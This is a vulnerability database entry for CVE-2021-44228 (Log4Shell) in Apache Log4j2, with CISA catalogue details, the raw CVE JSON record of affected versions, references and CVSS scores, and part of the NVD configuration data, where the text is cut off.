Action not permitted
Modal body text goes here.
cve-2021-44228
Vulnerability from cvelistv5
Published
2021-12-10 00:00
Modified
2024-08-04 04:17
Severity ?
EPSS score ?
Summary
Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| ▼ | Apache Software Foundation | Apache Log4j2 |
Version: 2.0-beta9 < log4j-core* |
|
|
|||
CISA Known exploited vulnerability
Data from the Known Exploited Vulnerabilities Catalog
Date added: 2021-12-10
Due date: 2021-12-24
Required action: For all affected software assets for which updates exist, the only acceptable remediation actions are: 1) Apply updates; OR 2) remove affected assets from agency networks. Temporary mitigations using one of the measures provided at https://www.cisa.gov/uscert/ed-22-02-apache-log4j-recommended-mitigation-measures are only acceptable until updates are available.
Used in ransomware: Known
Notes: https://nvd.nist.gov/vuln/detail/CVE-2021-44228
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T04:17:24.696Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"name": "[oss-security] 20211210 CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2021/12/10/1"
},
{
"name": "[oss-security] 20211210 Re: CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2021/12/10/2"
},
{
"name": "20211210 Vulnerability in Apache Log4j Library Affecting Cisco Products: December 2021",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd"
},
{
"name": "[oss-security] 20211210 Re: CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2021/12/10/3"
},
{
"tags": [
"x_transferred"
],
"url": "https://security.netapp.com/advisory/ntap-20211210-0007/"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/165225/Apache-Log4j2-2.14.1-Remote-Code-Execution.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.oracle.com/security-alerts/alert-cve-2021-44228.html"
},
{
"name": "DSA-5020",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://www.debian.org/security/2021/dsa-5020"
},
{
"name": "[debian-lts-announce] 20211212 [SECURITY] [DLA 2842-1] apache-log4j2 security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2021/12/msg00007.html"
},
{
"name": "FEDORA-2021-f0f501d01f",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VU57UJDCFIASIO35GC55JMKSRXJMCDFM/"
},
{
"name": "Microsoft\u2019s Response to CVE-2021-44228 Apache Log4j 2",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/"
},
{
"name": "[oss-security] 20211213 Re: CVE-2021-4104: Deserialization of untrusted data in JMSAppender in Apache Log4j 1.2",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2021/12/13/2"
},
{
"name": "[oss-security] 20211213 CVE-2021-4104: Deserialization of untrusted data in JMSAppender in Apache Log4j 1.2",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2021/12/13/1"
},
{
"name": "[oss-security] 20211214 CVE-2021-45046: Apache Log4j2 Thread Context Message Pattern and Context Lookup Pattern vulnerable to a denial of service attack",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2021/12/14/4"
},
{
"name": "20211210 A Vulnerability in Apache Log4j Library Affecting Cisco Products: December 2021",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd"
},
{
"name": "VU#930724",
"tags": [
"third-party-advisory",
"x_transferred"
],
"url": "https://www.kb.cert.org/vuls/id/930724"
},
{
"tags": [
"x_transferred"
],
"url": "https://twitter.com/kurtseifried/status/1469345530182455296"
},
{
"tags": [
"x_transferred"
],
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdf"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/165260/VMware-Security-Advisory-2021-0028.html"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/165270/Apache-Log4j2-2.14.1-Remote-Code-Execution.html"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/165261/Apache-Log4j2-2.14.1-Information-Disclosure.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html"
},
{
"name": "20211210 Vulnerabilities in Apache Log4j Library Affecting Cisco Products: December 2021",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd"
},
{
"name": "[oss-security] 20211215 Re: CVE-2021-45046: Apache Log4j2 Thread Context Message Pattern and Context Lookup Pattern vulnerable to a denial of service attack",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2021/12/15/3"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/165282/Log4j-Payload-Generator.html"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/165281/Log4j2-Log4Shell-Regexes.html"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/165307/Log4j-Remote-Code-Execution-Word-Bypassing.html"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/165311/log4j-scan-Extensive-Scanner.html"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/165306/L4sh-Log4j-Remote-Code-Execution.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-714170.pdf"
},
{
"name": "FEDORA-2021-66d6c484f3",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/M5CSVUNV4HWZZXGOKNSK6L7RPM7BOKIB/"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/165371/VMware-Security-Advisory-2021-0028.4.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-397453.pdf"
},
{
"tags": [
"x_transferred"
],
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.oracle.com/security-alerts/cpujan2022.html"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/165532/Log4Shell-HTTP-Header-Injection.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.md"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/165642/VMware-vCenter-Server-Unauthenticated-Log4Shell-JNDI-Injection-Remote-Code-Execution.html"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/165673/UniFi-Network-Application-Unauthenticated-Log4Shell-Remote-Code-Execution.html"
},
{
"name": "20220314 APPLE-SA-2022-03-14-7 Xcode 13.3",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2022/Mar/23"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.bentley.com/en/common-vulnerability-exposure/be-2022-0001"
},
{
"tags": [
"x_transferred"
],
"url": "https://github.com/cisagov/log4j-affected-db"
},
{
"tags": [
"x_transferred"
],
"url": "https://support.apple.com/kb/HT213189"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-44228"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.nu11secur1ty.com/2021/12/cve-2021-44228.html"
},
{
"name": "20220721 Open-Xchange Security Advisory 2022-07-21",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2022/Jul/11"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/167794/Open-Xchange-App-Suite-7.10.x-Cross-Site-Scripting-Command-Injection.html"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/167917/MobileIron-Log4Shell-Remote-Command-Execution.html"
},
{
"name": "20221208 Intel Data Center Manager \u003c= 5.1 Local Privileges Escalation",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2022/Dec/2"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/171626/AD-Manager-Plus-7122-Remote-Code-Execution.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "Apache Log4j2",
"vendor": "Apache Software Foundation",
"versions": [
{
"changes": [
{
"at": "2.3.1",
"status": "unaffected"
},
{
"at": "2.4",
"status": "affected"
},
{
"at": "2.12.2",
"status": "unaffected"
},
{
"at": "2.13.0",
"status": "affected"
},
{
"at": "2.15.0",
"status": "unaffected"
}
],
"lessThan": "log4j-core*",
"status": "affected",
"version": "2.0-beta9",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"value": "This issue was discovered by Chen Zhaojun of Alibaba Cloud Security Team."
}
],
"descriptions": [
{
"lang": "en",
"value": "Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects."
}
],
"metrics": [
{
"other": {
"content": {
"other": "critical"
},
"type": "unknown"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-502",
"description": "CWE-502 Deserialization of Untrusted Data",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-400",
"description": "CWE-400 Uncontrolled Resource Consumption",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-20",
"description": "CWE-20 Improper Input Validation",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-04-03T00:00:00",
"orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"shortName": "apache"
},
"references": [
{
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"name": "[oss-security] 20211210 CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints",
"tags": [
"mailing-list"
],
"url": "http://www.openwall.com/lists/oss-security/2021/12/10/1"
},
{
"name": "[oss-security] 20211210 Re: CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints",
"tags": [
"mailing-list"
],
"url": "http://www.openwall.com/lists/oss-security/2021/12/10/2"
},
{
"name": "20211210 Vulnerability in Apache Log4j Library Affecting Cisco Products: December 2021",
"tags": [
"vendor-advisory"
],
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd"
},
{
"name": "[oss-security] 20211210 Re: CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints",
"tags": [
"mailing-list"
],
"url": "http://www.openwall.com/lists/oss-security/2021/12/10/3"
},
{
"url": "https://security.netapp.com/advisory/ntap-20211210-0007/"
},
{
"url": "http://packetstormsecurity.com/files/165225/Apache-Log4j2-2.14.1-Remote-Code-Execution.html"
},
{
"url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032"
},
{
"url": "https://www.oracle.com/security-alerts/alert-cve-2021-44228.html"
},
{
"name": "DSA-5020",
"tags": [
"vendor-advisory"
],
"url": "https://www.debian.org/security/2021/dsa-5020"
},
{
"name": "[debian-lts-announce] 20211212 [SECURITY] [DLA 2842-1] apache-log4j2 security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2021/12/msg00007.html"
},
{
"name": "FEDORA-2021-f0f501d01f",
"tags": [
"vendor-advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VU57UJDCFIASIO35GC55JMKSRXJMCDFM/"
},
{
"name": "Microsoft\u2019s Response to CVE-2021-44228 Apache Log4j 2",
"tags": [
"vendor-advisory"
],
"url": "https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/"
},
{
"name": "[oss-security] 20211213 Re: CVE-2021-4104: Deserialization of untrusted data in JMSAppender in Apache Log4j 1.2",
"tags": [
"mailing-list"
],
"url": "http://www.openwall.com/lists/oss-security/2021/12/13/2"
},
{
"name": "[oss-security] 20211213 CVE-2021-4104: Deserialization of untrusted data in JMSAppender in Apache Log4j 1.2",
"tags": [
"mailing-list"
],
"url": "http://www.openwall.com/lists/oss-security/2021/12/13/1"
},
{
"name": "[oss-security] 20211214 CVE-2021-45046: Apache Log4j2 Thread Context Message Pattern and Context Lookup Pattern vulnerable to a denial of service attack",
"tags": [
"mailing-list"
],
"url": "http://www.openwall.com/lists/oss-security/2021/12/14/4"
},
{
"name": "20211210 A Vulnerability in Apache Log4j Library Affecting Cisco Products: December 2021",
"tags": [
"vendor-advisory"
],
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd"
},
{
"name": "VU#930724",
"tags": [
"third-party-advisory"
],
"url": "https://www.kb.cert.org/vuls/id/930724"
},
{
"url": "https://twitter.com/kurtseifried/status/1469345530182455296"
},
{
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdf"
},
{
"url": "http://packetstormsecurity.com/files/165260/VMware-Security-Advisory-2021-0028.html"
},
{
"url": "http://packetstormsecurity.com/files/165270/Apache-Log4j2-2.14.1-Remote-Code-Execution.html"
},
{
"url": "http://packetstormsecurity.com/files/165261/Apache-Log4j2-2.14.1-Information-Disclosure.html"
},
{
"url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html"
},
{
"name": "20211210 Vulnerabilities in Apache Log4j Library Affecting Cisco Products: December 2021",
"tags": [
"vendor-advisory"
],
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd"
},
{
"name": "[oss-security] 20211215 Re: CVE-2021-45046: Apache Log4j2 Thread Context Message Pattern and Context Lookup Pattern vulnerable to a denial of service attack",
"tags": [
"mailing-list"
],
"url": "http://www.openwall.com/lists/oss-security/2021/12/15/3"
},
{
"url": "http://packetstormsecurity.com/files/165282/Log4j-Payload-Generator.html"
},
{
"url": "http://packetstormsecurity.com/files/165281/Log4j2-Log4Shell-Regexes.html"
},
{
"url": "http://packetstormsecurity.com/files/165307/Log4j-Remote-Code-Execution-Word-Bypassing.html"
},
{
"url": "http://packetstormsecurity.com/files/165311/log4j-scan-Extensive-Scanner.html"
},
{
"url": "http://packetstormsecurity.com/files/165306/L4sh-Log4j-Remote-Code-Execution.html"
},
{
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-714170.pdf"
},
{
"name": "FEDORA-2021-66d6c484f3",
"tags": [
"vendor-advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/M5CSVUNV4HWZZXGOKNSK6L7RPM7BOKIB/"
},
{
"url": "http://packetstormsecurity.com/files/165371/VMware-Security-Advisory-2021-0028.4.html"
},
{
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-397453.pdf"
},
{
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf"
},
{
"url": "https://www.oracle.com/security-alerts/cpujan2022.html"
},
{
"url": "http://packetstormsecurity.com/files/165532/Log4Shell-HTTP-Header-Injection.html"
},
{
"url": "https://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.md"
},
{
"url": "http://packetstormsecurity.com/files/165642/VMware-vCenter-Server-Unauthenticated-Log4Shell-JNDI-Injection-Remote-Code-Execution.html"
},
{
"url": "http://packetstormsecurity.com/files/165673/UniFi-Network-Application-Unauthenticated-Log4Shell-Remote-Code-Execution.html"
},
{
"name": "20220314 APPLE-SA-2022-03-14-7 Xcode 13.3",
"tags": [
"mailing-list"
],
"url": "http://seclists.org/fulldisclosure/2022/Mar/23"
},
{
"url": "https://www.bentley.com/en/common-vulnerability-exposure/be-2022-0001"
},
{
"url": "https://github.com/cisagov/log4j-affected-db"
},
{
"url": "https://support.apple.com/kb/HT213189"
},
{
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"url": "https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-44228"
},
{
"url": "https://www.nu11secur1ty.com/2021/12/cve-2021-44228.html"
},
{
"name": "20220721 Open-Xchange Security Advisory 2022-07-21",
"tags": [
"mailing-list"
],
"url": "http://seclists.org/fulldisclosure/2022/Jul/11"
},
{
"url": "http://packetstormsecurity.com/files/167794/Open-Xchange-App-Suite-7.10.x-Cross-Site-Scripting-Command-Injection.html"
},
{
"url": "http://packetstormsecurity.com/files/167917/MobileIron-Log4Shell-Remote-Command-Execution.html"
},
{
"name": "20221208 Intel Data Center Manager \u003c= 5.1 Local Privileges Escalation",
"tags": [
"mailing-list"
],
"url": "http://seclists.org/fulldisclosure/2022/Dec/2"
},
{
"url": "http://packetstormsecurity.com/files/171626/AD-Manager-Plus-7122-Remote-Code-Execution.html"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints",
"x_generator": {
"engine": "Vulnogram 0.0.9"
}
}
},
"cveMetadata": {
"assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"assignerShortName": "apache",
"cveId": "CVE-2021-44228",
"datePublished": "2021-12-10T00:00:00",
"dateReserved": "2021-11-26T00:00:00",
"dateUpdated": "2024-08-04T04:17:24.696Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"meta": {
"cisa_known_exploited": {
"cveID": "CVE-2021-44228",
"cwes": "[\"CWE-20\", \"CWE-400\", \"CWE-502\"]",
"dateAdded": "2021-12-10",
"dueDate": "2021-12-24",
"knownRansomwareCampaignUse": "Known",
"notes": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228",
"product": "Log4j2",
"requiredAction": "For all affected software assets for which updates exist, the only acceptable remediation actions are: 1) Apply updates; OR 2) remove affected assets from agency networks. Temporary mitigations using one of the measures provided at https://www.cisa.gov/uscert/ed-22-02-apache-log4j-recommended-mitigation-measures are only acceptable until updates are available.",
"shortDescription": "Apache Log4j2 contains a vulnerability where JNDI features do not protect against attacker-controlled JNDI-related endpoints, allowing for remote code execution.",
"vendorProject": "Apache",
"vulnerabilityName": "Apache Log4j2 Remote Code Execution Vulnerability"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2021-44228\",\"sourceIdentifier\":\"security@apache.org\",\"published\":\"2021-12-10T10:15:09.143\",\"lastModified\":\"2024-11-21T06:30:38.047\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.\"},{\"lang\":\"es\",\"value\":\"Las caracter\u00edsticas JNDI de Apache Log4j2 2.0-beta9 hasta 2.15.0 (excluyendo las versiones de seguridad 2.12.2, 2.12.3 y 2.3.1) utilizadas en la configuraci\u00f3n, los mensajes de registro y los par\u00e1metros no protegen contra LDAP controlado por un atacante y otros puntos finales relacionados con JNDI. Un atacante que pueda controlar los mensajes de registro o los par\u00e1metros de los mensajes de registro puede ejecutar c\u00f3digo arbitrario cargado desde servidores LDAP cuando la sustituci\u00f3n de la b\u00fasqueda de mensajes est\u00e1 habilitada. A partir de la versi\u00f3n 2.15.0 de log4j, este comportamiento ha sido deshabilitado por defecto. A partir de la versi\u00f3n 2.16.0 (junto con las versiones 2.12.2, 2.12.3 y 2.3.1), esta funcionalidad se ha eliminado por completo. Tenga en cuenta que esta vulnerabilidad es espec\u00edfica de log4j-core y no afecta a log4net, log4cxx u otros proyectos de Apache Logging Services\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\",\"baseScore\":10.0,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":6.0}],\"cvssMetricV2\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"2.0\",\"vectorString\":\"AV:N/AC:M/Au:N/C:C/I:C/A:C\",\"baseScore\":9.3,\"accessVector\":\"NETWORK\",\"accessComplexity\":\"MEDIUM\",\"authentication\":\"NONE\",\"confidentialityImpact\":\"COMPLETE\",\"integrityImpact\":\"COMPLETE\",\"availabilityImpact\":\"COMPLETE\"},\"baseSeverity\":\"HIGH\",\"exploitabilityScore\":8.6,\"impactScore\":10.0,\"acInsufInfo\":false,\"obtainAllPrivilege\":false,\"obtainUserPrivilege\":false,\"obtainOtherPrivilege\":false,\"userInteractionRequired\":false}]},\"cisaExploitAdd\":\"2021-12-10\",\"cisaActionDue\":\"2021-12-24\",\"cisaRequiredAction\":\"For all affected software assets for which updates exist, the only acceptable remediation actions are: 1) Apply updates; OR 2) remove affected assets from agency networks. Temporary mitigations using one of the measures provided at https://www.cisa.gov/uscert/ed-22-02-apache-log4j-recommended-mitigation-measures are only acceptable until updates are available.\",\"cisaVulnerabilityName\":\"Apache Log4j2 Remote Code Execution Vulnerability\",\"weaknesses\":[{\"source\":\"security@apache.org\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-20\"},{\"lang\":\"en\",\"value\":\"CWE-400\"},{\"lang\":\"en\",\"value\":\"CWE-502\"}]},{\"source\":\"nvd@nist.gov\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-917\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"2.0.1\",\"versionEndExcluding\":\"2.3.1\",\"matchCriteriaId\":\"03FA5E81-F9C0-403E-8A4B-E4284E4E7B72\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"2.4.0\",\"versionEndExcluding\":\"2.12.2\",\"matchCriteriaId\":\"AED3D5EC-DAD5-4E5F-8BBD-B4E3349D84FC\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"2.13.0\",\"versionEndExcluding\":\"2.15.0\",\"matchCriteriaId\":\"D31D423D-FC4D-428A-B863-55AF472B80DC\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:apache:log4j:2.0:-:*:*:*:*:*:*\",\"matchCriteriaId\":\"17854E42-7063-4A55-BF2A-4C7074CC2D60\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:apache:log4j:2.0:beta9:*:*:*:*:*:*\",\"matchCriteriaId\":\"53F32FB2-6970-4975-8BD0-EAE12E9AD03A\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:apache:log4j:2.0:rc1:*:*:*:*:*:*\",\"matchCriteriaId\":\"B773ED91-1D39-42E6-9C52-D02210DE1A94\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:apache:log4j:2.0:rc2:*:*:*:*:*:*\",\"matchCriteriaId\":\"EF24312D-1A62-482E-8078-7EC24758B710\"}]}]},{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:siemens:sppa-t3000_ses3000_firmware:*:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"E8320869-CBF4-4C92-885C-560C09855BFA\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:siemens:sppa-t3000_ses3000:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"755BA221-33DD-40A2-A517-8574D042C261\"}]}]},{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:captial:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"2019.1\",\"matchCriteriaId\":\"07856DAA-EDB4-4522-BA16-CD302C9E39EF\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:captial:2019.1:-:*:*:*:*:*:*\",\"matchCriteriaId\":\"F7AD819D-D093-472E-AA47-1A925111E4C8\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:captial:2019.1:sp1912:*:*:*:*:*:*\",\"matchCriteriaId\":\"2D07A11A-A3C6-4D44-B2E0-A8358D23947A\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:comos:*:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"61597661-A3B0-4A14-AA6B-C911E0063390\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:desigo_cc_advanced_reports:4.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"BB524B33-68E7-46A2-B5CE-BCD9C3194B8B\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:desigo_cc_advanced_reports:4.1:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"5F852C6D-44A0-4CCE-83C7-4501CAD73F9F\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:desigo_cc_advanced_reports:4.2:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"AA61161C-C2E7-4852-963E-E2D3DFBFDC7B\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:desigo_cc_advanced_reports:5.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"A76AA04A-BB43-4027-895E-D1EACFCDF41B\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:desigo_cc_advanced_reports:5.1:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"2A6B60F3-327B-49B7-B5E4-F1C60896C9BB\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:desigo_cc_info_center:5.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"4BCF281E-B0A2-49E2-AEF8-8691BDCE08D5\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:desigo_cc_info_center:5.1:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"A87EFCC4-4BC1-4FEA-BAA4-8FF221838EBD\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:e-car_operation_center:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"2021-12-13\",\"matchCriteriaId\":\"B678380B-E95E-4A8B-A49D-D13B62AA454E\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:energy_engage:3.1:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"4557476B-0157-44C2-BB50-299E7C7E1E72\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:energyip:8.5:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"991B2959-5AA3-4B68-A05A-42D9860FAA9D\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:siemens:energyip:8.6:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"7E5948A0-CA31-41DF-85B6-1E6D09E5720B\"},{\"vulnerable\":true,\"criter